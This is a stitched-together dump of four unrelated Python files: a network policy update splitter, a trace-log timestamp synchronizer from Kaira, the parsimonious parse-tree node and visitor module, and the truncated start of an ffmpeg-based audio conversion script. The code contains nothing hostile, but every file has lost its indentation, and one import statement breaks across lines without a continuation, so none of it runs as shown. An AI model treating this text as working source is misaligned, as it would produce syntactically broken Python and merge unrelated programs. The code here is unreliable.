Actor that takes the role of message broker, farming updates out to IPv4
and IPv6-specific actors.
Users of the API should follow this contract:
(1) send an apply_snapshot message containing a complete and consistent
snapshot of the data model.
(2) send in-order updates via the on_xyz_update messages.
(3) at any point, repeat from (1)
"""
def __init__(self, config, ipsets_mgrs, rules_managers, endpoint_managers,
iptables_updaters, ipv4_masq_manager):
super(UpdateSplitter, self).__init__()
self.config = config
self.ipsets_mgrs = ipsets_mgrs
self.iptables_updaters = iptables_updaters
self.rules_mgrs = rules_managers
self.endpoint_mgrs = endpoint_managers
self.ipv4_masq_manager = ipv4_masq_manager
self._cleanup_scheduled = False
@actor_message()
def apply_snapshot(self, rules_by_prof_id, tags_by_prof_id,
endpoints_by_id, ipv4_pools_by_id):
"""
Replaces the whole cache state with the input. Applies deltas vs the
current active state.
:param rules_by_prof_id: A dict mapping security profile ID to a list
of profile rules, each of which is a dict.
:param tags_by_prof_id: A dict mapping security profile ID to a list of
profile tags.
:param endpoints_by_id: A dict mapping EndpointId objects to endpoint
data dicts.
:param ipv4_pools_by_id: A dict mapping IPAM pool ID to dicts
representing the pool.
"""
# Step 1: fire in data update events to the profile and tag managers
# so they can build their indexes before we activate anything.
_log.info("Applying snapshot. Queueing rules.")
for rules_mgr in self.rules_mgrs:
rules_mgr.apply_snapshot(rules_by_prof_id, async=True)
_log.info("Applying snapshot. Queueing tags/endpoints to ipset mgr.")
for ipset_mgr in self.ipsets_mgrs:
ipset_mgr.apply_snapshot(tags_by_prof_id, endpoints_by_id,
async=True)
# Step 2: fire in update events into the endpoint manager, which will
# recursively trigger activation of profiles and tags.
_log.info("Applying snapshot. Queueing endpoints->endpoint mgr.")
for ep_mgr in self.endpoint_mgrs:
ep_mgr.apply_snapshot(endpoints_by_id, async=True)
# Step 3: send update to NAT manager.
_log.info("Applying snapshot. Queueing IPv4 pools -> masq mgr.")
self.ipv4_masq_manager.apply_snapshot(ipv4_pools_by_id, async=True)
_log.info("Applying snapshot. DONE. %s rules, %s tags, "
"%s endpoints, %s pools", len(rules_by_prof_id),
len(tags_by_prof_id), len(endpoints_by_id),
len(ipv4_pools_by_id))
# Since we don't wait for all the above processing to finish, set a
# timer to clean up orphaned ipsets and tables later. If the snapshot
# takes longer than this timer to apply then we might do the cleanup
# before the snapshot is finished. That would cause dropped packets
# until applying the snapshot finishes.
if not self._cleanup_scheduled:
_log.info("No cleanup scheduled, scheduling one.")
gevent.spawn_later(self.config.STARTUP_CLEANUP_DELAY,
functools.partial(self.trigger_cleanup,
async=True))
self._cleanup_scheduled = True
@actor_message()
def trigger_cleanup(self):
"""
Called from a separate greenlet, asks the managers to clean up
unused ipsets and iptables.
"""
self._cleanup_scheduled = False
_log.info("Triggering a cleanup of orphaned ipsets/chains")
# Need to clean up iptables first because they reference ipsets
# and force them to stay alive.
for ipt_updater in self.iptables_updaters:
ipt_updater.cleanup(async=False)
# It's still worth a try to clean up any ipsets that we can.
for ipset_mgr in self.ipsets_mgrs:
ipset_mgr.cleanup(async=False)
@actor_message()
def on_rules_update(self, profile_id, rules):
"""
Process an update to the rules of the given profile.
:param str profile_id: Profile ID in question
:param dict[str,list[dict]] rules: New set of inbound/outbound rules
or None if the rules have been deleted.
"""
_log.info("Profile update: %s", profile_id)
for rules_mgr in self.rules_mgrs:
rules_mgr.on_rules_update(profile_id, rules, async=True)
@actor_message()
def on_tags_update(self, profile_id, tags):
"""
Called when the given tag list has changed or been deleted.
:param str profile_id: Profile ID in question
:param list[str] tags: List of tags for the given profile or None if
deleted.
"""
_log.info("Tags for profile %s updated", profile_id)
for ipset_mgr in self.ipsets_mgrs:
ipset_mgr.on_tags_update(profile_id, tags, async=True)
@actor_message()
def on_interface_update(self, name):
"""
Called when an interface state has changed.
:param str name: Interface name
"""
_log.info("Interface %s state changed", name)
for endpoint_mgr in self.endpoint_mgrs:
endpoint_mgr.on_interface_update(name, async=True)
@actor_message()
def on_endpoint_update(self, endpoint_id, endpoint):
"""
Process an update to the given endpoint. endpoint may be None if
the endpoint was deleted.
:param EndpointId endpoint_id: EndpointId object in question
:param dict endpoint: Endpoint data dict
"""
_log.info("Endpoint update for %s.", endpoint_id)
for ipset_mgr in self.ipsets_mgrs:
ipset_mgr.on_endpoint_update(endpoint_id, endpoint, async=True)
for endpoint_mgr in self.endpoint_mgrs:
endpoint_mgr.on_endpoint_update(endpoint_id, endpoint, async=True)
@actor_message()
def on_ipam_pool_update(self, pool_id, pool):
_log.info("IPAM pool %s updated", pool_id)
self.ipv4_masq_manager.on_ipam_pool_updated(pool_id, pool, async=True)
|
#
# Copyright (C) 2015-2016 Tomas Panoc
#
# This file is part of Kaira.
#
# Kaira is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, version 3 of the License, or
# (at your option) any later version.
#
# Kaira is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Kaira. If not, see <http://www.gnu.org/licenses/>.
#
import xml.etree.ElementTree as xml
import loader
from runinstance import RunInstance
from tracelog import TraceLog, Trace
from Queue import Queue
from collections import OrderedDict
from cStringIO import StringIO
class SyncedTraceLog (TraceLog):
""" SyncedTraceLog -- synchronizes timestamps within a Kaira tracelog
(*.kth), removes the clock condition violations
"""
def __init__(self, **kwargs):
""" Creates new SyncedTraceLog object, different method is used
according to the passed keyword.
Key: 'fromtracelog' -> Value:
Tuple(
a path to a tracelog file (*.kth),
settings tuple( min_event_diff, min_msg_delay,
forward_amort, backward_amort,
weak_sync )
)
min_event_diff -- Minimal difference between 2 events
in a process (nanoseconds)
min_msg_delay -- Minimum message delay of messages from
one process to another (nanoseconds)
forward_amort -- True/False, turns on/off forward amortization
feature
backward_amort -- True/False, turns on/off backward
amortization feature
weak_sync -- True/False, turns on/off initial weak synchronization
Creates a new SyncedTraceLog object from an existing TraceLog
object and does the synchronization
Key: 'fromfile' -> Value: A path to a *.kst
Loads an existing already synchronized *.kst file
"""
if "fromtracelog" in kwargs:
TraceLog.__init__(self, kwargs["fromtracelog"][0], False, True, False)
self._syncing = True
self._from_tracelog(kwargs["fromtracelog"][1])
elif "fromfile" in kwargs:
TraceLog.__init__(self, kwargs["fromfile"][0], False, False)
self._syncing = False
self._from_file(kwargs["fromfile"])
else:
raise Exception("Unknown keyword argument!")
def _from_tracelog(self, settings):
# Matrix of unprocessed sent messages
self.messages = [[SQueue() for x in range(self.process_count)] for x in range(self.process_count)]
self.minimal_event_diff = settings[0]
self.minimum_msg_delay = settings[1]
self.forward_amort = settings[2]
self.backward_amort = settings[3]
self.weak_sync = settings[4]
self.straces = []
messenger = Messenger(self)
for t in self.traces:
strace = SyncedTrace(t.data, t.process_id, self.pointer_size, \
self.minimal_event_diff, \
self.minimum_msg_delay, \
self.forward_amort, \
self.backward_amort, \
self.messages, \
messenger)
self.straces.append(strace)
self.traces = self.straces
self._synchronize()
def _from_file(self, filename):
self.process_count, self.pointer_size, self.traces, self.project = \
SyncedTraceLogLoader(filename).load()
self.filename = filename
self.export_data = True
self.first_runinstance = RunInstance(self.project, self.process_count)
self._preprocess(False)
def _synchronize(self):
""" Main feature of this class. It controls whole synchronization
procedure
"""
# Apply initial weak synchronization
if self.weak_sync:
maxspawntrace = max( self.traces, key=lambda x: x.get_next_event_time() )
for trace in self.traces:
trace.time_offset = maxspawntrace.get_next_event_time() - trace.get_next_event_time()
trace.set_init_time(maxspawntrace.get_init_time())
# Make an init time of the process with the lowest init time reference
# time for all events from all processes
else:
starttime = min([ trace.get_init_time() for trace in self.traces ])
for trace in self.traces:
trace.time_offset = trace.get_init_time() - starttime
trace.set_init_time(trace.time_offset)
# List of unprocessed processes
processes = [x for x in range(self.process_count)]
# A process which will be processed
current_p = processes[0]
# Control mechanism goes through every event of a process,
# it jumps to another process if a send event of reached receive event
# is found to be unprocessed or if the end of process is reached
while processes:
working_p = current_p
trace = self.traces[working_p]
while working_p == current_p:
if trace.get_next_event_time() is not None:
if trace.get_next_event_name() == "Recv ":
sender = trace.get_msg_sender()
if self.messages[sender][current_p].empty() is False:
trace.process_event()
if self.backward_amort:
#Backward amortization - add receive time and maximum offset
self.traces[sender].refill_received_time(trace.get_last_received_sent_time(),\
trace.get_last_receive_event_time(),\
working_p)
else:
current_p = sender
else:
trace.process_event()
else:
processes.remove(current_p)
#List is empty, stops the loop
if not processes:
current_p += 1
else:
current_p = processes[0]
for trace in self.traces:
trace.finalize()
def refill_received_time(self, target, send_time, receive_time, receiver, \
new_record=True):
""" Pairs a received time with the corresponding sent time and computes
maximum offset. Works only if the backward amortization is turned
on.
Arguments:
target -- ID of a process whose data should be refilled
send_time -- time of a corresponding send event
receive_time -- time of a receipt of the msg to be filled
new_record -- if True you are adding missing received time otherwise \
you are updating an existing received time
"""
if self._syncing:
self.traces[target].refill_received_time(send_time, receive_time, \
receiver, new_record)
def export_to_file(self, filename):
""" Saves synchronized tracelog to a file
Arguments:
filename -- Path to a *.kst
"""
data = str(self.pointer_size) + '\n' + str(self.process_count) + '\n'
traces = ""
for t in self.traces:
tdata = t.export_data()
data += str(len(tdata)) + '\n'
traces += tdata
data += traces
with open(self.filename, "r") as f:
f.readline()
data += f.read()
with open(filename, "wb") as f:
f.write(data)
class SyncedTraceLogLoader(object):
""" Performs loading of a *.kst file """
def __init__(self, filename):
""" Initialization.
Arguments:
filename -- path to a *.kst file
"""
self._filename = filename
self._loaded = False
def load(self):
""" Loads content of *.kst.
Returns tuple (number of processes, pointer size, list of traces'
binary data, XML description of program/project)
"""
if not self._loaded:
self.pointer_size = 0
self.traces = []
self.project = None
with open(self._filename, "rb") as f:
self.pointer_size = int(f.readline())
self.process_count = int(f.readline())
i = 0
processes_length = []
while i < self.process_count:
processes_length.append(int(f.readline()))
i += 1
i = 0
for p in processes_length:
trace = Trace(f.read(p), i, self.pointer_size)
self.traces.append(trace)
i += 1
x = xml.fromstring(f.read())
self.project = loader.load_project_from_xml(x, "")
self._loaded = True
return (self.process_count, self.pointer_size, self.traces,
self.project)
class SyncedTrace(Trace):
""" Synchronizes timestamps of events within one process. """
def __init__(self, data, process_id, pointer_size, minimal_event_diff, \
minimum_msg_delay, \
forward_amort, \
backward_amort, \
messages, \
messenger):
""" Synchronizes timestamps of events within one process.
Arguments:
data -- content of a process's *.ktt file
process_id -- ID of the process
pointer_size -- 4 or 8, type of binary data within the *.ktt file
minimal_event_diff -- see the SyncedTraceLog class
minimum_msg_delay -- see the SyncedTraceLog class
forward_amort -- see the SyncedTraceLog class
backward_amort -- see the SyncedTraceLog class
messages -- shared variable among SyncedTraces, 2-dimensional array
of SQueues, first coordinate is a sender of a message,
second is the recipient, SQueues store sent events.
messenger -- an object of the Messenger class, communicator between
the SyncedTrace and a SyncedTraceLog
"""
Trace.__init__(self, data, process_id, pointer_size)
self._minimal_event_diff = minimal_event_diff
self._minimum_msg_delay = minimum_msg_delay
self._forward_amort = forward_amort
self._backward_amort = backward_amort
self._messages = messages
self._messenger = messenger
self._data_list = []
self._header_info = self.data[:self.pointer]
self._last_event_time = 0
self._send_events = OrderedDict()
self._last_received_sent_time = 0
self._last_refilled_send_time = None
self._last_receive_event_time = 0
self._receive_send_table = {}
self._BA_tasks = []
def _clock_check(self, time, start_pointer, end_pointer=False, \
is_receive=False, sent_time=0):
""" Checks, computes and repairs an event timestamp
Arguments:
time -- a timestamp to be checked
start_pointer -- a pointer value before an event unpacking/reading
end_pointer -- a pointer value after the event unpacking/reading,
if False self.pointer is used
is_receive -- marks synchronization of a receive event
sent_time -- a timestamp of corresponding send event
Returns corrected time.
"""
newtime = 0
if not is_receive:
newtime = self._clock(time + self.time_offset)
else:
newtime = self._clock_receive(time + self.time_offset, sent_time)
# Save time to the data list
self._repair_time(newtime, start_pointer, end_pointer)
return newtime
def _clock(self, time):
""" Computes a new time for a process's internal or send event
Arguments:
time -- the time to be fixed
Returns corrected time.
"""
newtime = 0
if self._last_event_time != 0:
newtime = max([time, self._last_event_time + \
self._minimal_event_diff])
else:
newtime = time
self._last_event_time = newtime
return newtime
def _clock_receive(self, time, sent_time):
""" Computes a new time for a process's receive event
Arguments:
time -- the time to be fixed
sent_time -- time of the corresponding send event
Returns corrected time.
"""
newtime = 0
if self._last_event_time != 0:
newtime = max([sent_time + self._minimum_msg_delay, time, \
self._last_event_time + \
self._minimal_event_diff])
else:
newtime = max([sent_time + self._minimum_msg_delay, time])
if self._forward_amort:
self._forward_amortization(time, newtime)
self._last_event_time = newtime
self._last_receive_event_time = newtime
return newtime
def _forward_amortization(self, origin_time, new_time):
""" Checks shift of a receive event. If a shift exists the time offset
is increased to keep the spacing between two events
(Forward amortization)
Arguments:
origin_time -- original timestamp of an receive event
new_time -- corrected/synchronized timestamp of the event
"""
if new_time > origin_time:
self.time_offset += new_time - origin_time
def finalize(self):
""" Finalize the synchronization of a trace. This should be called after
the timestamp correction of all traces within a tracelog.
"""
if not self._backward_amort:
return
for task in self._BA_tasks:
self._backward_amortization(task.original, task.time)
def _do_BA(self, newtime, original):
""" Creates a new request (task) for BA and performs all previous tasks
which are ready.
"""
if not self._backward_amort:
return
if self._last_event_time == 0:
return
if newtime <= original:
return
ready = self.are_receive_times_refilled()
self._BA_tasks.append( BATask( newtime, original, ready ) )
for task in self._BA_tasks[ : -1]:
rdy = self.are_receive_times_refilled(task.time)
task.ready = rdy
if rdy:
self._backward_amortization(task.original, task.time)
if ready:
self._backward_amortization(original, newtime)
self._BA_tasks = [task for task in self._BA_tasks if not task.ready]
def _backward_amortization(self, origin_time, new_time):
""" Applies the backward amortization. It expects that received
times for all preceding send events have been filled.
Arguments:
origin_time -- the original timestamp of receive event
new_time -- corrected/synchronized timestamp of the event
"""
offset = new_time - origin_time
send_event_keys = [ key for key in self._send_events.keys() if key > new_time ]
linear_send_events = OrderedDict()
# Pick send events which occurred before the receive event
if send_event_keys:
tmp_point = self._send_events.keys().index(send_event_keys[0])
send_set = self._send_events.keys()[ : tmp_point ]
else:
send_set = self._send_events.keys()
# Linear correction - formation of a set of breakpoints
previous = SendEvent()
delete_events = Queue()
for event in send_set:
se = self._send_events[event]
if len(se) > 1:
index = se.index( min( se, key=lambda x: x.offset ) )
bp = se[index]
else:
bp = se[0]
bp.time = event
linear_send_events[event] = bp
if bp.offset <= previous.offset or previous.offset >= offset:
delete_events.put(previous.time)
previous = bp
if previous.offset >= offset:
delete_events.put(previous.time)
length = delete_events.qsize()
while length > 0:
linear_send_events.pop(delete_events.get(), None)
length -= 1
# Repair times
send_event = [0]
local_offset = offset
# Is there any event that cannot be shifted by full amount of the
# offset?
if linear_send_events:
send_event = linear_send_events.popitem(False)
local_offset = send_event[1].offset
new_send_events = OrderedDict()
for index, event in enumerate(self._data_list):
if event[1] == new_time:
break
if event[0] == "M":
tmp_time = event[1]
time = tmp_time + local_offset
event[1] = time
new_send_events[time] = []
for e in self._send_events[tmp_time]:
e.offset -= local_offset
new_send_events[time].append(e)
self._last_refilled_send_time = time
if tmp_time == send_event[0]:
if linear_send_events:
send_event = linear_send_events.popitem(False)
local_offset = send_event[1].offset
else:
send_event = [0]
local_offset = offset
else:
event[1] += local_offset
if event[0] == "R":
send_time = self._receive_send_table[index].get_sent_time()
origin_id = self._receive_send_table[index].origin_id
self._messenger.refill_received_time(origin_id, send_time, \
event[1], \
self.process_id, \
False)
# Add send events behind the receive event back
for key in send_event_keys:
new_send_events[key] = self._send_events[key]
self._last_refilled_send_time = key
self._send_events = new_send_events
def are_receive_times_refilled(self, received_time=None):
""" Returns True if all send events (SendEvents) in chosen interval
have been informed about the received time.
Arguments:
received_time -- time of a receive event which specifies an upper
border for the set of send events that is going
to be checked
"""
times = self._send_events.keys()
if self._last_refilled_send_time is not None:
start = times.index(self._last_refilled_send_time)
times = times[start:]
if received_time is not None:
times = [t for t in times if t < received_time]
for t in times:
for e in self._send_events[t]:
if e.receive == 0:
return False
return True
def refill_received_time(self, sent_time, received_time, receiver, new_record=True):
""" Matches receive time to a specific sent time and computes
maximum offset.
Arguments:
sent_time -- time of the corresponding send event in this trace
received_time -- the receive time
receiver -- ID of a process where the receive event happened
new_record -- if True you are adding missing received time otherwise
you are updating an existing received time
"""
for event in self._send_events[sent_time]:
if event.receiver == receiver:
event.receive = received_time
event.offset = received_time - \
self._minimum_msg_delay - sent_time
if new_record:
self._last_refilled_send_time = sent_time
break
def export_data(self):
""" Returns synchronized data in a raw binary form. """
stream = StringIO()
stream.write(self._header_info)
for event in self._data_list:
event[1] = self.struct_basic.pack(event[1])
for data in event:
stream.write(data)
export = stream.getvalue()
stream.close()
return export
def set_init_time(self, increment, direct=False):
""" Increase initial time of a process by the increment
Arguments:
increment -- an integer value which is added to the initial time
direct -- if True the function procedure is changed - the initial
time is set to the increment
"""
origin = self.info["inittime"]
if direct:
newtime = str(increment)
else:
newtime = str(int(origin) + increment)
self.info["inittime"] = newtime
self._header_info = self._header_info.replace(origin, newtime)
def get_msg_sender(self):
""" Returns None, or the id of a process which is the sender of the
received message if the next event is receive event
"""
if self.get_next_event_name() == "Recv ":
tmp_pointer = self.pointer
self.pointer += 1
origin_id = self._read_struct_receive()[1]
self.pointer = tmp_pointer
return origin_id
else:
return None
def get_last_received_sent_time(self):
""" Returns last received (obtained from messages) sent time. """
return self._last_received_sent_time
def get_last_receive_event_time(self):
""" Returns time of last synchronized receive event. """
return self._last_receive_event_time
def _repair_time(self, time, start_pointer, end_pointer):
""" Overwrites original time in tracelog's data string with the new one
Arguments:
time -- a new time to be saved
start_pointer -- points to the start of event's data
end_pointer -- points to the end of event ('s data)
"""
event = self._data_list[-1]
event.append(time)
start_pointer += self.struct_basic.size
if end_pointer is False:
end_pointer = self.pointer
event.append( self.data[ start_pointer : end_pointer ] )
def _extra_time(self, time, pointer, receive=False, origin_id=None):
""" Calls functions for time synchronization
Arguments:
time -- time to be synchronized
pointer -- points to the start of event's data
receive -- set True if you want to synchronize receive event
origin_id -- if receive is True, specify id of the sender
"""
if not receive:
return self._clock_check(time, pointer)
else:
if origin_id is None:
raise Exception("Origin_id for a receive event not entered!")
send_event = self._messages[origin_id][self.process_id].get()
sent_time = send_event[1]
self._receive_send_table[ len(self._data_list) - 1 ] = RSTableElement(send_event, origin_id)
tmp_original_time = time + self.time_offset
ctime = self._clock_check(time, pointer, False, True, sent_time)
self._do_BA(ctime, tmp_original_time)
self._last_received_sent_time = sent_time
return ctime
def _extra_event_send(self, time, target_id):
""" Adds send event to the message queue and to trace's list of sends
Arguments:
time -- already synchronized time of the send event
target_id -- message recipient
"""
self._messages[self.process_id][target_id].put(self._data_list[-1])
send_event = SendEvent()
send_event.receiver = target_id
if time not in self._send_events.keys():
self._send_events[time] = [send_event]
else:
self._send_events[time].append(send_event)
def _extra_event(self, event):
""" Stores event symbol into trace's data """
self._data_list.append([event])
def _extra_value(self):
""" Retrieves record of the last processed event """
return self._data_list[-1]
def _extra_tokens_add(self, pointer, extra, values):
""" Stores additional event's data. """
if values:
extra.append(self.data[pointer:self.pointer])
class SQueue(Queue):
""" Classic Queue with possibility of reading an element instead of popping """
def __init__(self):
Queue.__init__(self)
def get_and_keep(self):
""" Returns an element prepared for popping. """
value = self.get()
self.queue.appendleft(value)
return value
class Messenger(object):
""" Connector between SyncedTraceLog and SyncedTrace """
def __init__(self, target):
""" Initialization.
Arguments:
target -- Reference to SyncedTraceLog
"""
self._target = target
def refill_received_time(self, target, send_time, receive_time, receiver, \
new_record=True):
""" Pairs a receive time to the corresponding sent time and computes
maximum offset. Works only if the backward amortization is turned
on.
Arguments:
target -- ID of a process whose data should be refilled
send_time -- time of a corresponding send event
receive_time -- time of a receipt of the msg to be filled
new_record -- if True you are adding missing receive time otherwise \
you are updating an existing receive time
"""
self._target.refill_received_time(target, send_time, receive_time, \
receiver, new_record)
class SendEvent(object):
""" Send event structure.
Attributes:
time -- sent time
receive -- received time
receiver -- a recipient of the message
offset -- difference between received and sent time
"""
def __init__(self):
self.time = 0
self.receive = 0
self.receiver = None
self.offset = 0
class RSTableElement(object):
""" Reference to a send event """
def __init__(self, send_event, origin_id):
""" Initialization.
Arguments:
send_event -- reference to a send event
origin_id -- ID of the message sender
"""
self.send_event = send_event
self.origin_id = origin_id
def get_sent_time(self):
""" Returns time of sent event """
return self.send_event[1]
class BATask(object):
""" Task for Backward Amortization
Represents a receive event which causes BA
"""
def __init__(self, receive_time, original_time, ready):
""" Initialization
Arguments:
receive_time -- corrected/synchronized timestamp of receive event
original_time -- original timestamp of receive event
ready -- True/False - marks whether all preceding send events were
matched to their corresponding receive events
"""
self.time = receive_time
self.original = original_time
self.ready = ready
|
"""Nodes that make up parse trees
Parsing spits out a tree of these, which you can then tell to walk itself and
spit out a useful value. Or you can walk it yourself; the structural attributes
are public.
"""
# TODO: If this is slow, think about using cElementTree or something.
from inspect import isfunction
from sys import version_info, exc_info
from parsimonious.exceptions import VisitationError, UndefinedLabel
from parsimonious.utils import StrAndRepr
from six import reraise, python_2_unicode_compatible, with_metaclass,
iteritems
@python_2_unicode_compatible
class Node(StrAndRepr):
"""A parse tree node
Consider these immutable once constructed. As a side effect of a
memory-saving strategy in the cache, multiple references to a single
``Node`` might be returned in a single parse tree. So, if you start
messing with one, you'll see surprising parallel changes pop up elsewhere.
My philosophy is that parse trees (and their nodes) should be
representation-agnostic. That is, they shouldn't get all mixed up with what
the final rendered form of a wiki page (or the intermediate representation
of a programming language, or whatever) is going to be: you should be able
to parse once and render several representations from the tree, one after
another.
"""
# I tried making this subclass list, but it got ugly. I had to construct
# invalid ones and patch them up later, and there were other problems.
__slots__ = ['expr_name', # The name of the expression that generated me
'full_text', # The full text fed to the parser
'start', # The position in the text where that expr started matching
'end', # The position after starft where the expr first didn't
# match. [start:end] follow Python slice conventions.
'children'] # List of child parse tree nodes
def __init__(self, expr_name, full_text, start, end, children=None):
self.expr_name = expr_name
self.full_text = full_text
self.start = start
self.end = end
self.children = children or []
def __iter__(self):
"""Support looping over my children and doing tuple unpacks on me.
It can be very handy to unpack nodes in arg lists; see
:class:`PegVisitor` for an example.
"""
return iter(self.children)
@property
def text(self):
"""Return the text this node matched."""
return self.full_text[self.start:self.end]
# From here down is just stuff for testing and debugging.
def prettily(self, error=None):
"""Return a unicode, pretty-printed representation of me.
:arg error: The node to highlight because an error occurred there
"""
# TODO: If a Node appears multiple times in the tree, we'll point to
# them all. Whoops.
def indent(text):
return '\n'.join((' ' + line) for line in text.splitlines())
ret = [u'<%s%s matching "%s">%s' % (
self.__class__.__name__,
(' called "%s"' % self.expr_name) if self.expr_name else '',
self.text,
' <-- *** We were here. ***' if error is self else '')]
for n in self:
ret.append(indent(n.prettily(error=error)))
return '\n'.join(ret)
def __str__(self):
"""Return a compact, human-readable representation of me."""
return self.prettily()
def __eq__(self, other):
"""Support by-value deep comparison with other nodes for testing."""
return (other is not None and
self.expr_name == other.expr_name and
self.full_text == other.full_text and
self.start == other.start and
self.end == other.end and
self.children == other.children)
def __ne__(self, other):
return not self == other
def __repr__(self, top_level=True):
"""Return a bit of code (though not an expression) that will recreate
me."""
# repr() of unicode flattens everything out to ASCII, so we don't need
# to explicitly encode things afterward.
ret = ["s = %r" % self.full_text] if top_level else []
ret.append("%s(%r, s, %s, %s%s)" % (
self.__class__.__name__,
self.expr_name,
self.start,
self.end,
(', children=[%s]' %
', '.join([c.__repr__(top_level=False) for c in self.children]))
if self.children else ''))
return '\n'.join(ret)
class RegexNode(Node):
"""Node returned from a ``Regex`` expression
Grants access to the ``re.Match`` object, in case you want to access
capturing groups, etc.
"""
__slots__ = ['match']
class RuleDecoratorMeta(type):
def __new__(metaclass, name, bases, namespace):
def unvisit(name):
"""Remove any leading "visit_" from a method name."""
return name[6:] if name.startswith('visit_') else name
methods = [v for k, v in iteritems(namespace) if
hasattr(v, '_rule') and isfunction(v)]
if methods:
from parsimonious.grammar import Grammar # circular import dodge
methods.sort(key=(lambda x: x.func_code.co_firstlineno)
if version_info[0] < 3 else
(lambda x: x.__code__.co_firstlineno))
# Possible enhancement: once we get the Grammar extensibility story
# solidified, we can have @rules *add* to the default grammar
# rather than pave over it.
namespace['grammar'] = Grammar(
'\n'.join('{name} = {expr}'.format(name=unvisit(m.__name__),
expr=m._rule)
for m in methods))
return super(RuleDecoratorMeta,
metaclass).__new__(metaclass, name, bases, namespace)
class NodeVisitor(with_metaclass(RuleDecoratorMeta,object)):
"""A shell for writing things that turn parse trees into something useful
Performs a depth-first traversal of an AST. Subclass this, add methods for
each expr you care about, instantiate, and call
``visit(top_node_of_parse_tree)``. It'll return the useful stuff. This API
is very similar to that of ``ast.NodeVisitor``.
These could easily all be static methods, but that would add at least as
much weirdness at the call site as the ``()`` for instantiation. And this
way, we support subclasses that require state state: options, for example,
or a symbol table constructed from a programming language's AST.
We never transform the parse tree in place, because...
* There are likely multiple references to the same ``Node`` object in a
parse tree, and changes to one reference would surprise you elsewhere.
* It makes it impossible to report errors: you'd end up with the "error"
arrow pointing someplace in a half-transformed mishmash of nodes--and
that's assuming you're even transforming the tree into another tree.
Heaven forbid you're making it into a string or something else.
"""
#: The :term:`default grammar`: the one recommended for use with this
#: visitor. If you populate this, you will be able to call
#: :meth:`NodeVisitor.parse()` as a shortcut.
grammar = None
#: Classes of exceptions you actually intend to raise during visitation
#: and which should propogate out of the visitor. These will not be
#: wrapped in a VisitationError when they arise.
unwrapped_exceptions = ()
# TODO: If we need to optimize this, we can go back to putting subclasses
# in charge of visiting children; they know when not to bother. Or we can
# mark nodes as not descent-worthy in the grammar.
def visit(self, node):
"""Walk a parse tree, transforming it into another representation.
Recursively descend a parse tree, dispatching to the method named after
the rule in the :class:`~parsimonious.grammar.Grammar` that produced
each node. If, for example, a rule was... ::
bold = '<b>'
...the ``visit_bold()`` method would be called. It is your
responsibility to subclass :class:`NodeVisitor` and implement those
methods.
"""
method = getattr(self, 'visit_' + node.expr_name, self.generic_visit)
# Call that method, and show where in the tree it failed if it blows
# up.
try:
return method(node, [self.visit(n) for n in node])
except (VisitationError, UndefinedLabel):
# Don't catch and re-wrap already-wrapped exceptions.
raise
except self.unwrapped_exceptions:
raise
except Exception:
# Catch any exception, and tack on a parse tree so it's easier to
# see where it went wrong.
exc_class, exc, tb = exc_info()
reraise(VisitationError, VisitationError(exc, exc_class, node), tb)
def generic_visit(self, node, visited_children):
"""Default visitor method
:arg node: The node we're visiting
:arg visited_children: The results of visiting the children of that
node, in a list
I'm not sure there's an implementation of this that makes sense across
all (or even most) use cases, so we leave it to subclasses to implement
for now.
"""
raise NotImplementedError("No visitor method was defined for %s." %
node.expr_name)
# Convenience methods:
def parse(self, text, pos=0):
"""Parse some text with this Visitor's default grammar.
``SomeVisitor().parse('some_string')`` is a shortcut for
``SomeVisitor().visit(some_grammar.parse('some_string'))``.
"""
return self._parse_or_match(text, pos, 'parse')
def match(self, text, pos=0):
"""Parse some text with this Visitor's default grammar, but don't
insist on parsing all the way to the end.
``SomeVisitor().match('some_string')`` is a shortcut for
``SomeVisitor().visit(some_grammar.match('some_string'))``.
"""
return self._parse_or_match(text, pos, 'match')
# Internal convenience methods to help you write your own visitors:
def lift_child(self, node, _a):
"""Lift the sole child of ``node`` up to replace the node."""
(first_child,) = _a
return first_child
# Private methods:
def _parse_or_match(self, text, pos, method_name):
"""Execute a parse or match on the default grammar, followed by a
visitation.
Raise RuntimeError if there is no default grammar specified.
"""
if not self.grammar:
raise RuntimeError(
"The {cls}.{method}() shortcut won't work because {cls} was "
"never associated with a specific " "grammar. Fill out its "
"`grammar` attribute, and try again.".format(
cls=self.__class__.__name__,
method=method_name))
return self.visit(getattr(self.grammar, method_name)(text, pos=pos))
def rule(rule_string):
"""Decorate a NodeVisitor ``visit_*`` method to tie a grammar rule to it.
The following will arrange for the ``visit_digit`` method to receive the
results of the ``~"[0-9]"`` parse rule::
@rule('~"[0-9]"')
def visit_digit(self, node, visited_children):
...
Notice that there is no "digit = " as part of the rule; that gets inferred
from the method name.
In cases where there is only one kind of visitor interested in a grammar,
using ``@rule`` saves you having to look back and forth between the visitor
and the grammar definition.
On an implementation level, all ``@rule`` rules get stitched together into
a :class:`~parsimonoius.Grammar` that becomes the NodeVisitor's
:term:`default grammar`.
Typically, the choice of a default rule for this grammar is simple: whatever
``@rule`` comes first in the class is the default. But the choice may become
surprising if you divide the ``@rule`` calls among subclasses. At the
moment, which method "comes first" is decided simply by comparing line
numbers, so whatever method is on the smallest-numbered line will be the
default. In a future release, this will change to pick the
first ``@rule`` call on the basemost class that has one. That way, a
subclass which does not override the default rule's ``visit_*`` method
won't unintentionally change which rule is the default.
"""
def decorator(method):
method._rule = rule_string # XXX: Maybe register them on a class var instead so we can just override a @rule'd visitor method on a subclass without blowing away the rule string that comes with it.
return method
return decorator
|
#! /usr/bin/env python
import sys
import os
import argparse
from multiprocessing import cpu_count
import threading
from time import sleep
import re
import shutil
# depends on python-scandir-git <https://aur.archlinux.org/packages/python-scandir-git>
import scandir
from pythonscripts.tempfiles import TempFiles
from pythonscripts.subprocess_extensions import getstatusoutput
from pythonscripts.ffparser import FFprobeParser
audio_types = ("mp3", "aac", "ac3", "mp2", "wma", "wav", "mka", "m4a", "ogg", "oga", "flac")
audio_file_regex = re.compile("^(?P<dirname>/(.*/)*)(?P<filename>.*(?P<extension>\.(" + "|".join(audio_types) + ")))$")
ffmpeg_command = "/usr/bin/ffmpeg -i %(input)s -acodec libmp3lame -ar 44100 -ab %(bitrate)dk -ac 2 -f mp3 -map_metadata 0 -y %(output)s"
class GettingBitrateError(Exception):
def __init__(self, fname):
self.message = "Couldn't get bitrate from file " + fname
class ConversionError(Exception):
def __init__(self, fname, status, output):
